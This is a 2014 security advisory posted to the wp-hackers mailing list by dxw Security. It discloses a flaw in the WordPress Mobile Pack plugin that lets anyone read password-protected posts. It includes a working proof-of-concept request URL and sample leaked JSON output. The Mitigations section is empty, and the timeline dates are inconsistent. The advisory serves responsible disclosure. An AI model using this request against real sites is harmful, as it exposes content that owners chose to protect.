[wp-hackers] Information disclosure vulnerability in WordPress Mobile Pack allows anybody to read password protected posts (WordPress plugin)

dxw Security security at dxw.com
Wed Aug 20 10:32:29 UTC 2014 

Details
================
Software: WordPress Mobile Pack
Version: 2.0.1
Homepage: http://wordpress.org/plugins/wordpress-mobile-pack/
Advisory report: https://security.dxw.com/advisories/information-disclosure-vulnerability-in-wordpress-mobile-pack-allows-anybody-to-read-password-protected-posts/
CVE: Awaiting assignment
CVSS: 5 (Medium; AV:N/AC:L/Au:N/C:P/I:N/A:N)

Description
================
Information disclosure vulnerability in WordPress Mobile Pack allows anybody to read password protected posts

Vulnerability
================
WordPress Mobile Pack contains a PHP file which allows anybody – authenticated or otherwise – to read all public and password protected posts (draft and private posts appear not to be affected).

Proof of concept
================

Create a password-protected post
Enable WordPress Mobile Pack
Visit http://localhost/wp-content/plugins/wordpress-mobile-pack/export/content.php?content=exportarticles&callback=x
Your password-protected post is now visible to everybody in the form of JSON wrapped in “x()”

Example output:
x (
    {
        \"articles\": [
            {
                \"id\": 849,
                \"title\": \"Secret post\",
                \"timestamp\": 1406231170,
                \"author\": \"admin\",
                \"date\": \"Thu, Jul 24, 2014, 19:46\",
                \"link\": \"http://wp.local/?p=849\",
                \"image\": \"\",
                \"description\": \"<p>HUSH THIS IS A SECRET</p>n\",
                \"content\": \"\",
                \"category_id\": 1,
                \"category_name\": \"Uncategorized\"
            }
        ]
    }
)

Mitigations
================

Disclosure policy
================
dxw believes in responsible disclosure. Your attention is drawn to our disclosure policy: https://security.dxw.com/disclosure/

Please contact us on security at dxw.com to acknowledge this report if you received it via a third party (for example, plugins at wordpress.org) as they generally cannot communicate with us on your behalf.

This vulnerability will be published if we do not receive a response to this report with 14 days.

Timeline
================

2014-07-24: Discovered
2014-07-13: Reported to developer via email
2014-08-19: Developer reported the issue fixed
2014-08-20: Advisory published



Discovered by dxw:
================
Tom Adams
Please visit security.dxw.com for more information.

More information about the wp-hackers mailing list